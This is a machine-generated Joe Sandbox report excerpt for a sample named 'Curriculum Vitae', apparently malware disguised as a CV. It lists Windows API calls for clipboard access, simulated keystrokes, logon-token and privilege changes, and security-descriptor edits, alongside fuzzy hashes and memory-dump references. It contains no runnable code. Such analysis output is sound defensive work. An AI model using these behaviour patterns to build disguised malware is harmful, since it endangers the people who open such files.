                      • String ID:
                      • API String ID: 3664257935-0
                      • Opcode ID: bb71adf9a483a174ce74382c2420488df006cb90fc587761a5f04c45b3332f47
                      • Instruction ID: 022021f98e4a0c1553d3a6f21e52ac55618af1fefbdc9b98222a224a2b6531bf
                      • Opcode Fuzzy Hash: bb71adf9a483a174ce74382c2420488df006cb90fc587761a5f04c45b3332f47
                      • Instruction Fuzzy Hash: 79F03071109752CFDB349F65D490812B7E4EF1432971889BEE5DA82611C735A844DF20
                      APIs
                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00D32DC4
                        • Part of subcall function 00D36B57: _wcslen.LIBCMT ref: 00D36B6A
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: LongNamePath_wcslen
                      • String ID:
                      • API String ID: 541455249-0
                      • Opcode ID: cf8bcb862cb3d91ad59093b3ae22628bf38265f5c9f0becc4623ad445cd671db
                      • Instruction ID: 64ff43d0b9283ecabc94818f3e2ccf739131ea7332e684512576368cc31105f2
                      • Opcode Fuzzy Hash: cf8bcb862cb3d91ad59093b3ae22628bf38265f5c9f0becc4623ad445cd671db
                      • Instruction Fuzzy Hash: DCE0CD76A042245BC71092589C06FDAB7DDDFC8790F044171FD0DD7248E960ED808670
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: __fread_nolock
                      • String ID:
                      • API String ID: 2638373210-0
                      • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                      • Instruction ID: fd027342adc3c6a1604a5ca0f7563ffe123dbe255cdab7e86c2f4102f424529b
                      • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                      • Instruction Fuzzy Hash: 32E048B06097005FDF3D6A28A9517B677E4DF4A301F04085EF59F82352E5726845865D
                      APIs
                        • Part of subcall function 00D33837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00D33908
                        • Part of subcall function 00D3D730: GetInputState.USER32 ref: 00D3D807
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00D32B6B
                        • Part of subcall function 00D330F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00D3314E
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: IconNotifyShell_$CurrentDirectoryInputState
                      • String ID:
                      • API String ID: 3667716007-0
                      • Opcode ID: 4f0c3df738f571edf1723e948e4c5204579239b169fa149bff78134ddb975e54
                      • Instruction ID: a779601ecab47627e09494df5ba3ac86d1581a37f7b40f87c3270988b96e18fc
                      • Opcode Fuzzy Hash: 4f0c3df738f571edf1723e948e4c5204579239b169fa149bff78134ddb975e54
                      • Instruction Fuzzy Hash: 25E0723270424407CA08BB70B8228BDF34ACBE1321F00247EF243872B3CF208A898332
                      APIs
                      • CreateFileW.KERNELBASE(00000000,00000000,?,00D70704,?,?,00000000,?,00D70704,00000000,0000000C), ref: 00D703B7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CreateFile
                      • String ID:
                      • API String ID: 823142352-0
                      • Opcode ID: 89360f6dfdedf8d7fade171a292a21a3681f49e622037aa10e1d290544277206
                      • Instruction ID: 3af54e036334592b6dbf03791415a2d686280c5e5f647f15a31fefbfed557917
                      • Opcode Fuzzy Hash: 89360f6dfdedf8d7fade171a292a21a3681f49e622037aa10e1d290544277206
                      • Instruction Fuzzy Hash: A7D06C3205020EBBDF028F85DD06EDA3BAAFB48714F014000FE1896120C732E821AB90
                      APIs
                      • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00D31CBC
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: InfoParametersSystem
                      • String ID:
                      • API String ID: 3098949447-0
                      • Opcode ID: 9c04b70297508b1418745ebf753384f42a276260258cdbf666e4d59a3a6c4626
                      • Instruction ID: c93714fdc3025b23e3bfa92cd5bc5a597b5d5c69ab2582535ef0d20d037c9927
                      • Opcode Fuzzy Hash: 9c04b70297508b1418745ebf753384f42a276260258cdbf666e4d59a3a6c4626
                      • Instruction Fuzzy Hash: AFC09236290306AFF3148B81BC4EF1077A4A348B00F049001F70DB9AE3C3A328A5EA65
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                      • Instruction ID: 076a4d23add64f55f33887a460d4e120d8bc311aaca5c48158a1424f7014d662
                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                      • Instruction Fuzzy Hash: 2731E275A00109DBC718CF59D4C0A69FBA6FF49300B2886A5E84ACF666D731EDC1CBE0
                      APIs
                      • Sleep.KERNELBASE(000001F4), ref: 03BB22B1
                      Memory Dump Source
                      • Source File: 00000000.00000002.2111540426.0000000003BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3bb0000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Sleep
                      • String ID:
                      • API String ID: 3472027048-0
                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                      • Instruction ID: 9908ed4135bf1c96294756aa2c63a05c24ffad4a0790737be072801ee267c245
                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                      • Instruction Fuzzy Hash: 59E0BF7494010E9FDB00EFB8D5496AE7BB4EF04301F1006A1FD01D2280DA7099508A62
                      APIs
                        • Part of subcall function 00D49BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D49BB2
                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00DC961A
                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00DC965B
                      • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00DC969F
                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00DC96C9
                      • SendMessageW.USER32 ref: 00DC96F2
                      • GetKeyState.USER32(00000011), ref: 00DC978B
                      • GetKeyState.USER32(00000009), ref: 00DC9798
                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00DC97AE
                      • GetKeyState.USER32(00000010), ref: 00DC97B8
                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00DC97E9
                      • SendMessageW.USER32 ref: 00DC9810
                      • SendMessageW.USER32(?,00001030,?,00DC7E95), ref: 00DC9918
                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00DC992E
                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00DC9941
                      • SetCapture.USER32(?), ref: 00DC994A
                      • ClientToScreen.USER32(?,?), ref: 00DC99AF
                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00DC99BC
                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00DC99D6
                      • ReleaseCapture.USER32 ref: 00DC99E1
                      • GetCursorPos.USER32(?), ref: 00DC9A19
                      • ScreenToClient.USER32(?,?), ref: 00DC9A26
                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00DC9A80
                      • SendMessageW.USER32 ref: 00DC9AAE
                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00DC9AEB
                      • SendMessageW.USER32 ref: 00DC9B1A
                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00DC9B3B
                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00DC9B4A
                      • GetCursorPos.USER32(?), ref: 00DC9B68
                      • ScreenToClient.USER32(?,?), ref: 00DC9B75
                      • GetParent.USER32(?), ref: 00DC9B93
                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00DC9BFA
                      • SendMessageW.USER32 ref: 00DC9C2B
                      • ClientToScreen.USER32(?,?), ref: 00DC9C84
                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00DC9CB4
                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00DC9CDE
                      • SendMessageW.USER32 ref: 00DC9D01
                      • ClientToScreen.USER32(?,?), ref: 00DC9D4E
                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00DC9D82
                        • Part of subcall function 00D49944: GetWindowLongW.USER32(?,000000EB), ref: 00D49952
                      • GetWindowLongW.USER32(?,000000F0), ref: 00DC9E05
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                      • String ID: @GUI_DRAGID$F$p#
                      • API String ID: 3429851547-638943876
                      • Opcode ID: d5e730b0d29dabf2c0f7219ae4a54551f893ce5d9884dd6de7d8ad54f8fac89b
                      • Instruction ID: cdff7f03760f7564cfc29341aee02c21bbce4fa35ada8ea871b2b630dd2fe05c
                      • Opcode Fuzzy Hash: d5e730b0d29dabf2c0f7219ae4a54551f893ce5d9884dd6de7d8ad54f8fac89b
                      • Instruction Fuzzy Hash: E0426934204202AFDB25CF24C868FAABBE5EF89310F14065DF699972E1D731E955CF61
                      APIs
                      • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00DC48F3
                      • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00DC4908
                      • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00DC4927
                      • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00DC494B
                      • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00DC495C
                      • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00DC497B
                      • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00DC49AE
                      • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00DC49D4
                      • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00DC4A0F
                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00DC4A56
                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00DC4A7E
                      • IsMenu.USER32(?), ref: 00DC4A97
                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00DC4AF2
                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00DC4B20
                      • GetWindowLongW.USER32(?,000000F0), ref: 00DC4B94
                      • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00DC4BE3
                      • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00DC4C82
                      • wsprintfW.USER32 ref: 00DC4CAE
                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00DC4CC9
                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 00DC4CF1
                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00DC4D13
                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00DC4D33
                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 00DC4D5A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                      • String ID: %d/%02d/%02d
                      • API String ID: 4054740463-328681919
                      • Opcode ID: 75ab58d7723575599ce9818911089e95b727d533c700fcc521c83e7c0c2908ac
                      • Instruction ID: c16503fd7637c0bc081cde4d16cabdb55fd2e7c9af532572715cf38934fdcd9c
                      • Opcode Fuzzy Hash: 75ab58d7723575599ce9818911089e95b727d533c700fcc521c83e7c0c2908ac
                      • Instruction Fuzzy Hash: 7612DE71600216ABEB258F28CD59FAE7BB8EF45310F14412DF51AEB2A1DB74D941CB70
                      APIs
                      • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00D4F998
                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00D8F474
                      • IsIconic.USER32(00000000), ref: 00D8F47D
                      • ShowWindow.USER32(00000000,00000009), ref: 00D8F48A
                      • SetForegroundWindow.USER32(00000000), ref: 00D8F494
                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00D8F4AA
                      • GetCurrentThreadId.KERNEL32 ref: 00D8F4B1
                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00D8F4BD
                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00D8F4CE
                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00D8F4D6
                      • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00D8F4DE
                      • SetForegroundWindow.USER32(00000000), ref: 00D8F4E1
                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D8F4F6
                      • keybd_event.USER32(00000012,00000000), ref: 00D8F501
                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D8F50B
                      • keybd_event.USER32(00000012,00000000), ref: 00D8F510
                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D8F519
                      • keybd_event.USER32(00000012,00000000), ref: 00D8F51E
                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D8F528
                      • keybd_event.USER32(00000012,00000000), ref: 00D8F52D
                      • SetForegroundWindow.USER32(00000000), ref: 00D8F530
                      • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00D8F557
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                      • String ID: Shell_TrayWnd
                      • API String ID: 4125248594-2988720461
                      • Opcode ID: 6ec568b273d70c27237549b05e395308427613993a7df2502f12efc7abddaab3
                      • Instruction ID: ae5db7eea7e9ba44a6e807c2e0d501b53d6093ce2219d3663554610526dbd373
                      • Opcode Fuzzy Hash: 6ec568b273d70c27237549b05e395308427613993a7df2502f12efc7abddaab3
                      • Instruction Fuzzy Hash: 17315271A50319BBEB206BB59C4AFBF7E6CEB44B50F141066F705E62D1C6B09D01AB70
                      APIs
                        • Part of subcall function 00D916C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00D9170D
                        • Part of subcall function 00D916C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00D9173A
                        • Part of subcall function 00D916C3: GetLastError.KERNEL32 ref: 00D9174A
                      • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00D91286
                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00D912A8
                      • CloseHandle.KERNEL32(?), ref: 00D912B9
                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00D912D1
                      • GetProcessWindowStation.USER32 ref: 00D912EA
                      • SetProcessWindowStation.USER32(00000000), ref: 00D912F4
                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00D91310
                        • Part of subcall function 00D910BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00D911FC), ref: 00D910D4
                        • Part of subcall function 00D910BF: CloseHandle.KERNEL32(?,?,00D911FC), ref: 00D910E9
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                      • String ID: $default$winsta0
                      • API String ID: 22674027-1027155976
                      • Opcode ID: 9debba7183fe595229152ac9698ea73780b7cc2edcd52dfa2d7ddf6257856d90
                      • Instruction ID: 921ca5e27c08e5f2b27626dba184a8cf1ddeef238b5f1869030cb0af72867457
                      • Opcode Fuzzy Hash: 9debba7183fe595229152ac9698ea73780b7cc2edcd52dfa2d7ddf6257856d90
                      • Instruction Fuzzy Hash: 3281677590030AABEF219FA4DC49FEE7BB9EF08704F184129FA15E62A0C7318955CB30
                      APIs
                        • Part of subcall function 00D910F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00D91114
                        • Part of subcall function 00D910F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00D90B9B,?,?,?), ref: 00D91120
                        • Part of subcall function 00D910F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00D90B9B,?,?,?), ref: 00D9112F
                        • Part of subcall function 00D910F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00D90B9B,?,?,?), ref: 00D91136
                        • Part of subcall function 00D910F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00D9114D
                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00D90BCC
                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00D90C00
                      • GetLengthSid.ADVAPI32(?), ref: 00D90C17
                      • GetAce.ADVAPI32(?,00000000,?), ref: 00D90C51
                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00D90C6D
                      • GetLengthSid.ADVAPI32(?), ref: 00D90C84
                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00D90C8C
                      • HeapAlloc.KERNEL32(00000000), ref: 00D90C93
                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00D90CB4
                      • CopySid.ADVAPI32(00000000), ref: 00D90CBB
                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00D90CEA
                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00D90D0C
                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00D90D1E
                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D90D45
                      • HeapFree.KERNEL32(00000000), ref: 00D90D4C
                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D90D55
                      • HeapFree.KERNEL32(00000000), ref: 00D90D5C
                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D90D65
                      • HeapFree.KERNEL32(00000000), ref: 00D90D6C
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00D90D78
                      • HeapFree.KERNEL32(00000000), ref: 00D90D7F
                        • Part of subcall function 00D91193: GetProcessHeap.KERNEL32(00000008,00D90BB1,?,00000000,?,00D90BB1,?), ref: 00D911A1
                        • Part of subcall function 00D91193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00D90BB1,?), ref: 00D911A8
                        • Part of subcall function 00D91193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00D90BB1,?), ref: 00D911B7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                      • String ID:
                      • API String ID: 4175595110-0
                      • Opcode ID: 06e8f4873eac8dbaea2627b224fa99a4269db203fe48ec9695cc90de234315d1
                      • Instruction ID: 9d48b2d423db71536cc8234af45eddb193557a5c3054d1fb651e8dd58ee1b155
                      • Opcode Fuzzy Hash: 06e8f4873eac8dbaea2627b224fa99a4269db203fe48ec9695cc90de234315d1
                      • Instruction Fuzzy Hash: D6712976A0020AAFDF109FA5EC44FEEBBBCBF04314F184515EA19E6291D771A905CB70
                      APIs
                      • OpenClipboard.USER32(00DCCC08), ref: 00DAEB29
                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 00DAEB37
                      • GetClipboardData.USER32(0000000D), ref: 00DAEB43
                      • CloseClipboard.USER32 ref: 00DAEB4F
                      • GlobalLock.KERNEL32(00000000), ref: 00DAEB87
                      • CloseClipboard.USER32 ref: 00DAEB91
                      • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00DAEBBC
                      • IsClipboardFormatAvailable.USER32(00000001), ref: 00DAEBC9
                      • GetClipboardData.USER32(00000001), ref: 00DAEBD1
                      • GlobalLock.KERNEL32(00000000), ref: 00DAEBE2
                      • GlobalUnlock.KERNEL32(00000000,?), ref: 00DAEC22
                      • IsClipboardFormatAvailable.USER32(0000000F), ref: 00DAEC38
                      • GetClipboardData.USER32(0000000F), ref: 00DAEC44
                      • GlobalLock.KERNEL32(00000000), ref: 00DAEC55
                      • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00DAEC77
                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00DAEC94
                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00DAECD2
                      • GlobalUnlock.KERNEL32(00000000,?,?), ref: 00DAECF3
                      • CountClipboardFormats.USER32 ref: 00DAED14
                      • CloseClipboard.USER32 ref: 00DAED59
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                      • String ID:
                      • API String ID: 420908878-0
                      • Opcode ID: a0cd016e25bd20af5bd12bf3254f306181518913759fa60b9d055e53da96d49f
                      • Instruction ID: 16170b850bfdfdd225957bf8500741791cba02e5993a9df66fbc3662422a69da
                      • Opcode Fuzzy Hash: a0cd016e25bd20af5bd12bf3254f306181518913759fa60b9d055e53da96d49f
